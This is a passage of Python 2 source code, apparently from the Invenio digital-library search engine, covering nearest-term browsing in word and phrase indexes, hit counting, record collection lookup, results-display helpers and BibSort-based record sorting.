intro = _("Search term %(x_term)s inside index %(x_index)s did not match any record. Nearest terms in any collection are:") % \
{'x_term': "<em>" + cgi.escape(p.startswith("%") and p.endswith("%") and p[1:-1] or p) + "</em>",
'x_index': "<em>" + cgi.escape(get_field_i18nname(get_field_name(f) or f, ln, False)) + "</em>"}
else:
intro = _("Search term %s did not match any record. Nearest terms in any collection are:") % \
("<em>" + cgi.escape(p.startswith("%") and p.endswith("%") and p[1:-1] or p) + "</em>")
return websearch_templates.tmpl_nearest_term_box(p=p, ln=ln, f=f, terminfo=terminfo,
intro=intro)
def get_nearest_terms_in_bibwords(p, f, n_below, n_above):
"""Return list of +n -n nearest terms to word `p' in index for field `f'."""
nearest_words = [] # will hold the (sorted) list of nearest words to return
# deduce into which bibwordsX table we will search:
bibwordsX = "idxWORD%02dF" % get_index_id_from_field("anyfield")
if f:
index_id = get_index_id_from_field(f)
if index_id:
bibwordsX = "idxWORD%02dF" % index_id
else:
return nearest_words
# firstly try to get `n' closest words above `p':
res = run_sql("SELECT term FROM %s WHERE term<%%s ORDER BY term DESC LIMIT %%s" % bibwordsX,
(p, n_above))
for row in res:
nearest_words.append(row[0])
nearest_words.reverse()
# secondly insert given word `p':
nearest_words.append(p)
# finally try to get `n' closest words below `p':
res = run_sql("SELECT term FROM %s WHERE term>%%s ORDER BY term ASC LIMIT %%s" % bibwordsX,
(p, n_below))
for row in res:
nearest_words.append(row[0])
return nearest_words
def get_nearest_terms_in_idxphrase(p, index_id, n_below, n_above):
"""Browse (-n_above, +n_below) closest bibliographic phrases
for the given pattern p in the given field idxPHRASE table,
regardless of collection.
Return list of [phrase1, phrase2, ... , phrase_n]."""
if CFG_INSPIRE_SITE and index_id in (3, 15): # FIXME: workaround due to new fuzzy index
return [p,]
idxphraseX = "idxPHRASE%02dF" % index_id
res_above = run_sql("SELECT term FROM %s WHERE term<%%s ORDER BY term DESC LIMIT %%s" % idxphraseX, (p, n_above))
res_above = map(lambda x: x[0], res_above)
res_above.reverse()
res_below = run_sql("SELECT term FROM %s WHERE term>=%%s ORDER BY term ASC LIMIT %%s" % idxphraseX, (p, n_below))
res_below = map(lambda x: x[0], res_below)
return res_above + res_below
def get_nearest_terms_in_idxphrase_with_collection(p, index_id, n_below, n_above, collection):
"""Browse (-n_above, +n_below) closest bibliographic phrases
for the given pattern p in the given field idxPHRASE table,
considering the collection (intbitset).
Return list of [(phrase1, hitset), (phrase2, hitset), ... , (phrase_n, hitset)]."""
idxphraseX = "idxPHRASE%02dF" % index_id
res_above = run_sql("SELECT term,hitlist FROM %s WHERE term<%%s ORDER BY term DESC LIMIT %%s" % idxphraseX, (p, n_above * 3))
res_above = [(term, intbitset(hitlist) & collection) for term, hitlist in res_above]
res_above = [(term, len(hitlist)) for term, hitlist in res_above if hitlist]
res_below = run_sql("SELECT term,hitlist FROM %s WHERE term>=%%s ORDER BY term ASC LIMIT %%s" % idxphraseX, (p, n_below * 3))
res_below = [(term, intbitset(hitlist) & collection) for term, hitlist in res_below]
res_below = [(term, len(hitlist)) for term, hitlist in res_below if hitlist]
res_above.reverse()
return res_above[-n_above:] + res_below[:n_below]
def get_nearest_terms_in_bibxxx(p, f, n_below, n_above):
"""Browse (-n_above, +n_below) closest bibliographic phrases
for the given pattern p in the given field f, regardless
of collection.
Return list of [phrase1, phrase2, ... , phrase_n]."""
## determine browse field:
if not f and string.find(p, ":") > 0: # does 'p' contain ':'?
f, p = string.split(p, ":", 1)
# FIXME: quick hack for the journal index
if f == 'journal':
return get_nearest_terms_in_bibwords(p, f, n_below, n_above)
## We are going to take max(n_below, n_above) as the number of
## values to ferch from bibXXx. This is needed to work around
## MySQL UTF-8 sorting troubles in 4.0.x. Proper solution is to
## use MySQL 4.1.x or our own idxPHRASE in the future.
index_id = get_index_id_from_field(f)
if index_id:
return get_nearest_terms_in_idxphrase(p, index_id, n_below, n_above)
n_fetch = 2*max(n_below, n_above)
## construct 'tl' which defines the tag list (MARC tags) to search in:
tl = []
if str(f[0]).isdigit() and str(f[1]).isdigit():
tl.append(f) # 'f' seems to be okay as it starts by two digits
else:
# deduce desired MARC tags on the basis of chosen 'f'
tl = get_field_tags(f)
## start browsing to fetch list of hits:
browsed_phrases = {} # will hold {phrase1: 1, phrase2: 1, ..., phraseN: 1} dict of browsed phrases (to make them unique)
# always add self to the results set:
browsed_phrases[p.startswith("%") and p.endswith("%") and p[1:-1] or p] = 1
for t in tl:
# deduce into which bibxxx table we will search:
digit1, digit2 = int(t[0]), int(t[1])
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
# firstly try to get `n' closest phrases above `p':
if len(t) != 6 or t[-1:]=='%': # only the beginning of field 't' is defined, so add wildcard character:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value<%%s AND bx.tag LIKE %%s
ORDER BY bx.value DESC LIMIT %%s""" % bx,
(p, t + "%", n_fetch))
else:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value<%%s AND bx.tag=%%s
ORDER BY bx.value DESC LIMIT %%s""" % bx,
(p, t, n_fetch))
for row in res:
browsed_phrases[row[0]] = 1
# secondly try to get `n' closest phrases equal to or below `p':
if len(t) != 6 or t[-1:]=='%': # only the beginning of field 't' is defined, so add wildcard character:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value>=%%s AND bx.tag LIKE %%s
ORDER BY bx.value ASC LIMIT %%s""" % bx,
(p, t + "%", n_fetch))
else:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value>=%%s AND bx.tag=%%s
ORDER BY bx.value ASC LIMIT %%s""" % bx,
(p, t, n_fetch))
for row in res:
browsed_phrases[row[0]] = 1
# select first n words only: (this is needed as we were searching
# in many different tables and so aren't sure we have more than n
# words right; this of course won't be needed when we shall have
# one ACC table only for given field):
phrases_out = browsed_phrases.keys()
phrases_out.sort(lambda x, y: cmp(string.lower(strip_accents(x)),
string.lower(strip_accents(y))))
# find position of self:
try:
idx_p = phrases_out.index(p)
except:
idx_p = len(phrases_out)/2
# return n_above and n_below:
return phrases_out[max(0, idx_p-n_above):idx_p+n_below]
def get_nearest_terms_in_bibrec(p, f, n_below, n_above):
"""Return list of nearest terms and counts from bibrec table.
p is usually a date, and f either datecreated or datemodified.
Note: below/above count is very approximative, not really respected.
"""
col = 'creation_date'
if f == 'datemodified':
col = 'modification_date'
res_above = run_sql("""SELECT DATE_FORMAT(%s,'%%%%Y-%%%%m-%%%%d %%%%H:%%%%i:%%%%s')
FROM bibrec WHERE %s < %%s
ORDER BY %s DESC LIMIT %%s""" % (col, col, col),
(p, n_above))
res_below = run_sql("""SELECT DATE_FORMAT(%s,'%%%%Y-%%%%m-%%%%d %%%%H:%%%%i:%%%%s')
FROM bibrec WHERE %s > %%s
ORDER BY %s ASC LIMIT %%s""" % (col, col, col),
(p, n_below))
out = set([])
for row in res_above:
out.add(row[0])
for row in res_below:
out.add(row[0])
out_list = list(out)
out_list.sort()
return list(out_list)
def get_nbhits_in_bibrec(term, f):
"""Return number of hits in bibrec table. term is usually a date,
and f is either 'datecreated' or 'datemodified'."""
col = 'creation_date'
if f == 'datemodified':
col = 'modification_date'
res = run_sql("SELECT COUNT(*) FROM bibrec WHERE %s LIKE %%s" % (col,),
(term + '%',))
return res[0][0]
def get_nbhits_in_bibwords(word, f):
"""Return number of hits for word 'word' inside words index for field 'f'."""
out = 0
# deduce into which bibwordsX table we will search:
bibwordsX = "idxWORD%02dF" % get_index_id_from_field("anyfield")
if f:
index_id = get_index_id_from_field(f)
if index_id:
bibwordsX = "idxWORD%02dF" % index_id
else:
return 0
if word:
res = run_sql("SELECT hitlist FROM %s WHERE term=%%s" % bibwordsX,
(word,))
for hitlist in res:
out += len(intbitset(hitlist[0]))
return out
def get_nbhits_in_idxphrases(word, f):
"""Return number of hits for word 'word' inside phrase index for field 'f'."""
out = 0
# deduce into which bibwordsX table we will search:
idxphraseX = "idxPHRASE%02dF" % get_index_id_from_field("anyfield")
if f:
index_id = get_index_id_from_field(f)
if index_id:
idxphraseX = "idxPHRASE%02dF" % index_id
else:
return 0
if word:
res = run_sql("SELECT hitlist FROM %s WHERE term=%%s" % idxphraseX,
(word,))
for hitlist in res:
out += len(intbitset(hitlist[0]))
return out
def get_nbhits_in_bibxxx(p, f, in_hitset=None):
"""Return number of hits for word 'word' inside words index for field 'f'."""
## determine browse field:
if not f and string.find(p, ":") > 0: # does 'p' contain ':'?
f, p = string.split(p, ":", 1)
# FIXME: quick hack for the journal index
if f == 'journal':
return get_nbhits_in_bibwords(p, f)
## construct 'tl' which defines the tag list (MARC tags) to search in:
tl = []
if str(f[0]).isdigit() and str(f[1]).isdigit():
tl.append(f) # 'f' seems to be okay as it starts by two digits
else:
# deduce desired MARC tags on the basis of chosen 'f'
tl = get_field_tags(f)
# start searching:
recIDs = {} # will hold dict of {recID1: 1, recID2: 1, ..., } (unique recIDs, therefore)
for t in tl:
# deduce into which bibxxx table we will search:
digit1, digit2 = int(t[0]), int(t[1])
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
if len(t) != 6 or t[-1:]=='%': # only the beginning of field 't' is defined, so add wildcard character:
res = run_sql("""SELECT bibx.id_bibrec FROM %s AS bibx, %s AS bx
WHERE bx.value=%%s AND bx.tag LIKE %%s
AND bibx.id_bibxxx=bx.id""" % (bibx, bx),
(p, t + "%"))
else:
res = run_sql("""SELECT bibx.id_bibrec FROM %s AS bibx, %s AS bx
WHERE bx.value=%%s AND bx.tag=%%s
AND bibx.id_bibxxx=bx.id""" % (bibx, bx),
(p, t))
for row in res:
recIDs[row[0]] = 1
if in_hitset is None:
nbhits = len(recIDs)
else:
nbhits = len(intbitset(recIDs.keys()).intersection(in_hitset))
return nbhits
def get_mysql_recid_from_aleph_sysno(sysno):
"""Returns DB's recID for ALEPH sysno passed in the argument (e.g. "002379334CER").
Returns None in case of failure."""
out = None
res = run_sql("""SELECT bb.id_bibrec FROM bibrec_bib97x AS bb, bib97x AS b
WHERE b.value=%s AND b.tag='970__a' AND bb.id_bibxxx=b.id""",
(sysno,))
if res:
out = res[0][0]
return out
def guess_primary_collection_of_a_record(recID):
"""Return primary collection name a record recid belongs to, by
testing 980 identifier.
May lead to bad guesses when a collection is defined dynamically
via dbquery.
In that case, return 'CFG_SITE_NAME'."""
out = CFG_SITE_NAME
dbcollids = get_fieldvalues(recID, "980__a")
for dbcollid in dbcollids:
variants = ("collection:" + dbcollid,
'collection:"' + dbcollid + '"',
"980__a:" + dbcollid,
'980__a:"' + dbcollid + '"',
'980:' + dbcollid ,
'980:"' + dbcollid + '"')
res = run_sql("SELECT name FROM collection WHERE dbquery IN (%s,%s,%s,%s,%s,%s)", variants)
if res:
out = res[0][0]
break
if CFG_CERN_SITE:
recID = int(recID)
# dirty hack for ATLAS collections at CERN:
if out in ('ATLAS Communications', 'ATLAS Internal Notes'):
for alternative_collection in ('ATLAS Communications Physics',
'ATLAS Communications General',
'ATLAS Internal Notes Physics',
'ATLAS Internal Notes General',):
if recID in get_collection_reclist(alternative_collection):
return alternative_collection
# dirty hack for FP
FP_collections = {'DO': ['Current Price Enquiries', 'Archived Price Enquiries'],
'IT': ['Current Invitation for Tenders', 'Archived Invitation for Tenders'],
'MS': ['Current Market Surveys', 'Archived Market Surveys']}
fp_coll_ids = [coll for coll in dbcollids if coll in FP_collections]
for coll in fp_coll_ids:
for coll_name in FP_collections[coll]:
if recID in get_collection_reclist(coll_name):
return coll_name
return out
_re_collection_url = re.compile('/collection/(.+)')
def guess_collection_of_a_record(recID, referer=None, recreate_cache_if_needed=True):
"""Return collection name a record recid belongs to, by first testing
the referer URL if provided and otherwise returning the
primary collection."""
if referer:
dummy, hostname, path, dummy, query, dummy = urlparse.urlparse(referer)
#requests can come from different invenio installations, with different collections
if CFG_SITE_URL.find(hostname) < 0:
return guess_primary_collection_of_a_record(recID)
g = _re_collection_url.match(path)
if g:
name = urllib.unquote_plus(g.group(1))
#check if this collection actually exist (also normalize the name if case-insensitive)
name = get_coll_normalised_name(name)
if name and recID in get_collection_reclist(name):
return name
elif path.startswith('/search'):
if recreate_cache_if_needed:
collection_reclist_cache.recreate_cache_if_needed()
query = cgi.parse_qs(query)
for name in query.get('cc', []) + query.get('c', []):
name = get_coll_normalised_name(name)
if name and recID in get_collection_reclist(name, recreate_cache_if_needed=False):
return name
return guess_primary_collection_of_a_record(recID)
def is_record_in_any_collection(recID, recreate_cache_if_needed=True):
"""Return True if the record belongs to at least one collection. This is a
good, although not perfect, indicator to guess if webcoll has already run
after this record has been entered into the system.
"""
if recreate_cache_if_needed:
collection_reclist_cache.recreate_cache_if_needed()
for name in collection_reclist_cache.cache.keys():
if recID in get_collection_reclist(name, recreate_cache_if_needed=False):
return True
return False
def get_all_collections_of_a_record(recID, recreate_cache_if_needed=True):
"""Return all the collection names a record belongs to.
Note this function is O(n_collections)."""
ret = []
if recreate_cache_if_needed:
collection_reclist_cache.recreate_cache_if_needed()
for name in collection_reclist_cache.cache.keys():
if recID in get_collection_reclist(name, recreate_cache_if_needed=False):
ret.append(name)
return ret
def get_tag_name(tag_value, prolog="", epilog=""):
"""Return tag name from the known tag value, by looking up the 'tag' table.
Return empty string in case of failure.
Example: input='100__%', output=first author'."""
out = ""
res = run_sql("SELECT name FROM tag WHERE value=%s", (tag_value,))
if res:
out = prolog + res[0][0] + epilog
return out
def get_fieldcodes():
"""Returns a list of field codes that may have been passed as 'search options' in URL.
Example: output=['subject','division']."""
out = []
res = run_sql("SELECT DISTINCT(code) FROM field")
for row in res:
out.append(row[0])
return out
def get_field_name(code):
"""Return the corresponding field_name given the field code.
e.g. reportnumber -> report number."""
res = run_sql("SELECT name FROM field WHERE code=%s", (code, ))
if res:
return res[0][0]
else:
return ""
def get_field_tags(field):
"""Returns a list of MARC tags for the field code 'field'.
Returns empty list in case of error.
Example: field='author', output=['100__%','700__%']."""
out = []
query = """SELECT t.value FROM tag AS t, field_tag AS ft, field AS f
WHERE f.code=%s AND ft.id_field=f.id AND t.id=ft.id_tag
ORDER BY ft.score DESC"""
res = run_sql(query, (field, ))
for val in res:
out.append(val[0])
return out
def get_merged_recid(recID):
""" Return the record ID of the record with
which the given record has been merged.
@param recID: deleted record recID
@type recID: int
@return: merged record recID
@rtype: int or None
"""
merged_recid = None
for val in get_fieldvalues(recID, "970__d"):
try:
merged_recid = int(val)
break
except ValueError:
pass
return merged_recid
def record_exists(recID):
"""Return 1 if record RECID exists.
Return 0 if it doesn't exist.
Return -1 if it exists but is marked as deleted.
"""
out = 0
res = run_sql("SELECT id FROM bibrec WHERE id=%s", (recID,), 1)
if res:
try: # if recid is '123foo', mysql will return id=123, and we don't want that
recID = int(recID)
except ValueError:
return 0
# record exists; now check whether it isn't marked as deleted:
dbcollids = get_fieldvalues(recID, "980__%")
if ("DELETED" in dbcollids) or (CFG_CERN_SITE and "DUMMY" in dbcollids):
out = -1 # exists, but marked as deleted
else:
out = 1 # exists fine
return out
def record_empty(recID):
"""
Is this record empty, e.g. has only 001, waiting for integration?
@param recID: the record identifier.
@type recID: int
@return: 1 if the record is empty, 0 otherwise.
@rtype: int
"""
record = get_record(recID)
if record is None or len(record) < 2:
return 1
else:
return 0
def record_public_p(recID, recreate_cache_if_needed=True):
"""Return 1 if the record is public, i.e. if it can be found in the Home collection.
Return 0 otherwise.
"""
return recID in get_collection_reclist(CFG_SITE_NAME, recreate_cache_if_needed=recreate_cache_if_needed)
def get_creation_date(recID, fmt="%Y-%m-%d"):
"Returns the creation date of the record 'recID'."
out = ""
res = run_sql("SELECT DATE_FORMAT(creation_date,%s) FROM bibrec WHERE id=%s", (fmt, recID), 1)
if res:
out = res[0][0]
return out
def get_modification_date(recID, fmt="%Y-%m-%d"):
"Returns the date of last modification for the record 'recID'."
out = ""
res = run_sql("SELECT DATE_FORMAT(modification_date,%s) FROM bibrec WHERE id=%s", (fmt, recID), 1)
if res:
out = res[0][0]
return out
def print_search_info(p, f, sf, so, sp, rm, of, ot, collection=CFG_SITE_NAME, nb_found=-1, jrec=1, rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS,
aas=0, ln=CFG_SITE_LANG, p1="", p2="", p3="", f1="", f2="", f3="", m1="", m2="", m3="", op1="", op2="",
sc=1, pl_in_url="",
d1y=0, d1m=0, d1d=0, d2y=0, d2m=0, d2d=0, dt="",
cpu_time=-1, middle_only=0, em=""):
"""Prints stripe with the information on 'collection' and 'nb_found' results and CPU time.
Also, prints navigation links (beg/next/prev/end) inside the results set.
If middle_only is set to 1, it will only print the middle box information (beg/netx/prev/end/etc) links.
This is suitable for displaying navigation links at the bottom of the search results page."""
if em != '' and EM_REPOSITORY["search_info"] not in em:
return ""
# sanity check:
if jrec < 1:
jrec = 1
if jrec > nb_found:
jrec = max(nb_found-rg+1, 1)
return websearch_templates.tmpl_print_search_info(
ln = ln,
collection = collection,
aas = aas,
collection_name = get_coll_i18nname(collection, ln, False),
collection_id = get_colID(collection),
middle_only = middle_only,
rg = rg,
nb_found = nb_found,
sf = sf,
so = so,
rm = rm,
of = of,
ot = ot,
p = p,
f = f,
p1 = p1,
p2 = p2,
p3 = p3,
f1 = f1,
f2 = f2,
f3 = f3,
m1 = m1,
m2 = m2,
m3 = m3,
op1 = op1,
op2 = op2,
pl_in_url = pl_in_url,
d1y = d1y,
d1m = d1m,
d1d = d1d,
d2y = d2y,
d2m = d2m,
d2d = d2d,
dt = dt,
jrec = jrec,
sc = sc,
sp = sp,
all_fieldcodes = get_fieldcodes(),
cpu_time = cpu_time,
)
def print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, collection=CFG_SITE_NAME, nb_found=-1, jrec=1, rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS,
aas=0, ln=CFG_SITE_LANG, p1="", p2="", p3="", f1="", f2="", f3="", m1="", m2="", m3="", op1="", op2="",
sc=1, pl_in_url="",
d1y=0, d1m=0, d1d=0, d2y=0, d2m=0, d2d=0, dt="",
cpu_time=-1, middle_only=0, em=""):
"""Prints stripe with the information on 'collection' and 'nb_found' results and CPU time.
Also, prints navigation links (beg/next/prev/end) inside the results set.
If middle_only is set to 1, it will only print the middle box information (beg/netx/prev/end/etc) links.
This is suitable for displaying navigation links at the bottom of the search results page."""
if em != '' and EM_REPOSITORY["search_info"] not in em:
return ""
# sanity check:
if jrec < 1:
jrec = 1
if jrec > nb_found:
jrec = max(nb_found-rg+1, 1)
return websearch_templates.tmpl_print_hosted_search_info(
ln = ln,
collection = collection,
aas = aas,
collection_name = get_coll_i18nname(collection, ln, False),
collection_id = get_colID(collection),
middle_only = middle_only,
rg = rg,
nb_found = nb_found,
sf = sf,
so = so,
rm = rm,
of = of,
ot = ot,
p = p,
f = f,
p1 = p1,
p2 = p2,
p3 = p3,
f1 = f1,
f2 = f2,
f3 = f3,
m1 = m1,
m2 = m2,
m3 = m3,
op1 = op1,
op2 = op2,
pl_in_url = pl_in_url,
d1y = d1y,
d1m = d1m,
d1d = d1d,
d2y = d2y,
d2m = d2m,
d2d = d2d,
dt = dt,
jrec = jrec,
sc = sc,
sp = sp,
all_fieldcodes = get_fieldcodes(),
cpu_time = cpu_time,
)
def print_results_overview(colls, results_final_nb_total, results_final_nb, cpu_time, ln=CFG_SITE_LANG, ec=[], hosted_colls_potential_results_p=False, em=""):
"""Prints results overview box with links to particular collections below."""
if em != "" and EM_REPOSITORY["overview"] not in em:
return ""
new_colls = []
for coll in colls:
new_colls.append({
'id': get_colID(coll),
'code': coll,
'name': get_coll_i18nname(coll, ln, False),
})
return websearch_templates.tmpl_print_results_overview(
ln = ln,
results_final_nb_total = results_final_nb_total,
results_final_nb = results_final_nb,
cpu_time = cpu_time,
colls = new_colls,
ec = ec,
hosted_colls_potential_results_p = hosted_colls_potential_results_p,
)
def print_hosted_results(url_and_engine, ln=CFG_SITE_LANG, of=None, req=None, no_records_found=False, search_timed_out=False, limit=CFG_EXTERNAL_COLLECTION_MAXRESULTS, em = ""):
"""Prints the full results of a hosted collection"""
if of.startswith("h"):
if no_records_found:
return "<br />No results found."
if search_timed_out:
return "<br />The search engine did not respond in time."
return websearch_templates.tmpl_print_hosted_results(
url_and_engine=url_and_engine,
ln=ln,
of=of,
req=req,
limit=limit,
display_body = em == "" or EM_REPOSITORY["body"] in em,
display_add_to_basket = em == "" or EM_REPOSITORY["basket"] in em)
class BibSortDataCacher(DataCacher):
"""
Cache holding all structures created by bibsort
( _data, data_dict).
"""
def __init__(self, method_name):
self.method_name = method_name
self.method_id = 0
try:
res = run_sql("""SELECT id from bsrMETHOD where name = %s""", (self.method_name,))
except:
self.method_id = 0
if res and res[0]:
self.method_id = res[0][0]
else:
self.method_id = 0
def cache_filler():
method_id = self.method_id
alldicts = {}
if self.method_id == 0:
return {}
try:
res_data = run_sql("""SELECT data_dict_ordered from bsrMETHODDATA \
where id_bsrMETHOD = %s""", (method_id,))
res_buckets = run_sql("""SELECT bucket_no, bucket_data from bsrMETHODDATABUCKET\
where id_bsrMETHOD = %s""", (method_id,))
except Exception:
# database problems, return empty cache
return {}
try:
data_dict_ordered = deserialize_via_marshal(res_data[0][0])
except:
data_dict_ordered = {}
alldicts['data_dict_ordered'] = data_dict_ordered # recid: weight
if not res_buckets:
alldicts['bucket_data'] = {}
return alldicts
for row in res_buckets:
bucket_no = row[0]
try:
bucket_data = intbitset(row[1])
except:
bucket_data = intbitset([])
alldicts.setdefault('bucket_data', {})[bucket_no] = bucket_data
return alldicts
def timestamp_verifier():
method_id = self.method_id
res = run_sql("""SELECT last_updated from bsrMETHODDATA where id_bsrMETHOD = %s""", (method_id,))
try:
update_time_methoddata = str(res[0][0])
except IndexError:
update_time_methoddata = '1970-01-01 00:00:00'
res = run_sql("""SELECT max(last_updated) from bsrMETHODDATABUCKET where id_bsrMETHOD = %s""", (method_id,))
try:
update_time_buckets = str(res[0][0])
except IndexError:
update_time_buckets = '1970-01-01 00:00:00'
return max(update_time_methoddata, update_time_buckets)
DataCacher.__init__(self, cache_filler, timestamp_verifier)
def get_sorting_methods():
if not CFG_BIBSORT_BUCKETS: # we do not want to use buckets
return {}
try: # make sure the method has some data
res = run_sql("""SELECT m.name, m.definition FROM bsrMETHOD m, bsrMETHODDATA md WHERE m.id = md.id_bsrMETHOD""")
except:
return {}
return dict(res)
sorting_methods = get_sorting_methods()
cache_sorted_data = {}
for sorting_method in sorting_methods:
try:
cache_sorted_data[sorting_method].is_ok_p
except Exception:
cache_sorted_data[sorting_method] = BibSortDataCacher(sorting_method)
def get_tags_from_sort_fields(sort_fields):
"""Given a list of sort_fields, return the tags associated with it and
also the name of the field that has no tags associated, to be able to
display a message to the user."""
tags = []
if not sort_fields:
return [], ''
for sort_field in sort_fields:
if sort_field and str(sort_field[0:2]).isdigit():
# sort_field starts by two digits, so this is probably a MARC tag already
tags.append(sort_field)
else:
# let us check the 'field' table
field_tags = get_field_tags(sort_field)
if field_tags:
tags.extend(field_tags)
else:
return [], sort_field
return tags, ''
def rank_records(req, rank_method_code, rank_limit_relevance, hitset_global, pattern=None, verbose=0, sort_order='d', of='hb', ln=CFG_SITE_LANG, rg=None, jrec=None, field=''):
"""Initial entry point for ranking records, acts like a dispatcher.
(i) rank_method_code is in bsrMETHOD, bibsort buckets can be used;
(ii)rank_method_code is not in bsrMETHOD, use bibrank;
"""
if CFG_BIBSORT_BUCKETS and sorting_methods:
for sort_method in sorting_methods:
definition = sorting_methods[sort_method]
if definition.startswith('RNK') and \
definition.replace('RNK:','').strip().lower() == string.lower(rank_method_code):
(solution_recs, solution_scores) = sort_records_bibsort(req, hitset_global, sort_method, '', sort_order, verbose, of, ln, rg, jrec, 'r')
#return (solution_recs, solution_scores, '', '', '')
comment = ''
if verbose > 0:
comment = 'find_citations retlist %s' % [[solution_recs[i], solution_scores[i]] for i in range(len(solution_recs))]
return (solution_recs, solution_scores, '(', ')', comment)
return rank_records_bibrank(rank_method_code, rank_limit_relevance, hitset_global, pattern, verbose, field, rg, jrec)
def sort_records(req, recIDs, sort_field='', sort_order='d', sort_pattern='', verbose=0, of='hb', ln=CFG_SITE_LANG, rg=None, jrec=None):
"""Initial entry point for sorting records, acts like a dispatcher.
(i) sort_field is in the bsrMETHOD, and thus, the BibSort has sorted the data for this field, so we can use the cache;
(ii)sort_field is not in bsrMETHOD, and thus, the cache does not contain any information regarding this sorting method"""
_ = gettext_set_language(ln)
#we should return sorted records up to irec_max(exclusive)
dummy, irec_max = get_interval_for_records_to_sort(len(recIDs), jrec, rg)
#calculate the min index on the reverted list
index_min = max(len(recIDs) - irec_max, 0) #just to be sure that the min index is not negative
#bibsort does not handle sort_pattern for now, use bibxxx
if sort_pattern:
return sort_records_bibxxx(req, recIDs, None, sort_field, sort_order, sort_pattern, verbose, of, ln, rg, jrec)
use_sorting_buckets = True
if not CFG_BIBSORT_BUCKETS or not sorting_methods: #ignore the use of buckets, use old fashion sorting
use_sorting_buckets = False
if not sort_field:
if use_sorting_buckets:
return sort_records_bibsort(req, recIDs, 'latest first', sort_field, sort_order, verbose, of, ln, rg, jrec)
else:
return recIDs[index_min:]
sort_fields = string.split(sort_field, ",")
if len(sort_fields) == 1:
# we have only one sorting_field, check if it is treated by BibSort
for sort_method in sorting_methods:
definition = sorting_methods[sort_method]
if use_sorting_buckets and \
((definition.startswith('FIELD') and \
definition.replace('FIELD:','').strip().lower() == string.lower(sort_fields[0])) or \
sort_method == sort_fields[0]):
#use BibSort
return sort_records_bibsort(req, recIDs, sort_method, sort_field, sort_order, verbose, of, ln, rg, jrec)
#deduce sorting MARC tag out of the 'sort_field' argument:
tags, error_field = get_tags_from_sort_fields(sort_fields)
if error_field:
if use_sorting_buckets:
return sort_records_bibsort(req, recIDs, 'latest first', sort_field, sort_order, verbose, of, ln, rg, jrec)
else:
if of.startswith('h'):
write_warning(_("Sorry, %s does not seem to be a valid sort option. The records will not be sorted.") % cgi.escape(error_field), "Error", req=req)
return recIDs[index_min:]
if tags:
for sort_method in sorting_methods:
definition = sorting_methods[sort_method]
if definition.startswith('MARC') \
and definition.replace('MARC:','').strip().split(',') == tags \
and use_sorting_buckets:
#this list of tags have a designated method in BibSort, so use it
return sort_records_bibsort(req, recIDs, sort_method, sort_field, sort_order, verbose, of, ln, rg, jrec)
#we do not have this sort_field in BibSort tables -> do the old fashion sorting
return sort_records_bibxxx(req, recIDs, tags, sort_field, sort_order, sort_pattern, verbose, of, ln, rg, jrec)
return recIDs[index_min:]
def sort_records_bibsort(req, recIDs, sort_method, sort_field='', sort_order='d', verbose=0, of='hb', ln=CFG_SITE_LANG, rg=None, jrec=None, sort_or_rank = 's'):
"""This function orders the recIDs list, based on a sorting method(sort_field) using the BibSortDataCacher for speed"""
_ = gettext_set_language(ln)
#sanity check
if sort_method not in sorting_methods:
if sort_or_rank == 'r':
return rank_records_bibrank(sort_method, 0, recIDs, None, verbose)
else:
return sort_records_bibxxx(req, recIDs, None, sort_field, sort_order, '', verbose, of, ln, rg, jrec)
if verbose >= 3 and of.startswith('h'):
write_warning("Sorting (using BibSort cache) by method %s (definition %s)." \
% (cgi.escape(repr(sort_method)), cgi.escape(repr(sorting_methods[sort_method]))), req=req)
#we should return sorted records up to irec_max(exclusive)
dummy, irec_max = get_interval_for_records_to_sort(len(recIDs), jrec, rg)
solution = intbitset([])
input_recids = intbitset(recIDs)
cache_sorted_data[sort_method].recreate_cache_if_needed()
sort_cache = cache_sorted_data[sort_method].cache
bucket_numbers = sort_cache['bucket_data'].keys()
#check if all buckets have been constructed
if len(bucket_numbers) != CFG_BIBSORT_BUCKETS:
if verbose > 3 and of.startswith('h'):
write_warning("Not all buckets have been constructed.. switching to old fashion sorting.", req=req)
if sort_or_rank == 'r':
return rank_records_bibrank(sort_method, 0, recIDs, None, verbose)
else:
return sort_records_bibxxx(req, recIDs, None, sort_field, sort_order, '', verbose, of, ln, rg, jrec)
if sort_order == 'd':
bucket_numbers.reverse()
for bucket_no in bucket_numbers:
solution.union_update(input_recids & sort_cache['bucket_data'][bucket_no])
if len(solution) >= irec_max:
break
dict_solution = {}
missing_records = []
for recid in solution:
try:
dict_solution[recid] = sort_cache['data_dict_ordered'][recid]
except KeyError:
#recid is in buckets, but not in the bsrMETHODDATA,
#maybe because the value has been deleted, but the change has not yet been propagated to the buckets
missing_records.append(recid)
#check if there are recids that are not in any bucket -> to be added at the end/top, ordered by insertion date
if len(solution) < irec_max:
#some records have not been yet inserted in the bibsort structures
#or, some records have no value for the sort_method
missing_records = sorted(missing_records + list(input_recids.difference(solution)))
#the records need to be sorted in reverse order for the print record function
#the return statement should be equivalent with the following statements
#(these are clearer, but less efficient, since they revert the same list twice)
#sorted_solution = (missing_records + sorted(dict_solution, key=dict_solution.__getitem__, reverse=sort_order=='d'))[:irec_max]
#sorted_solution.reverse()
#return sorted_solution
if sort_method.strip().lower().startswith('latest') and sort_order == 'd':
# if we want to sort the records on their insertion date, add the mission records at the top
solution = sorted(dict_solution, key=dict_solution.__getitem__, reverse=sort_order=='a') + missing_records
else:
solution = missing_records + sorted(dict_solution, key=dict_solution.__getitem__, reverse=sort_order=='a')
#calculate the min index on the reverted list
index_min = max(len(solution) - irec_max, 0) #just to be sure that the min index is not negative
#return all the records up to irec_max, but on the reverted list
if sort_or_rank == 'r':
# we need the recids, with values
return (solution[index_min:], [dict_solution.get(record, 0) for record in solution[index_min:]])
else:
return solution[index_min:]
def sort_records_bibxxx(req, recIDs, tags, sort_field='', sort_order='d', sort_pattern='', verbose=0, of='hb', ln=CFG_SITE_LANG, rg=None, jrec=None):
"""OLD FASHION SORTING WITH NO CACHE, for sort fields that are not run in BibSort
